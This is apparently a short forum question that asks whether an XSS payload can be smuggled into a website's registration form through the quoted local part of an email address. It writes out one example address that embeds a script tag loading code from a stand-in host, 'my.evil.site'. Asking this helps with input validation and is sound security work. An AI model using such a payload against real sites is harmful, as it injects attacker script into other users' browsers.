I wonder whether an email address can be used for XSS attacks.
Let's suppose there is a website where one can register and gives his email address. If one wants to attack the given website, he or she might create an email address, such as this one:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
and then use this email address to attack the website.
Is quote or script tag allowed in an email address?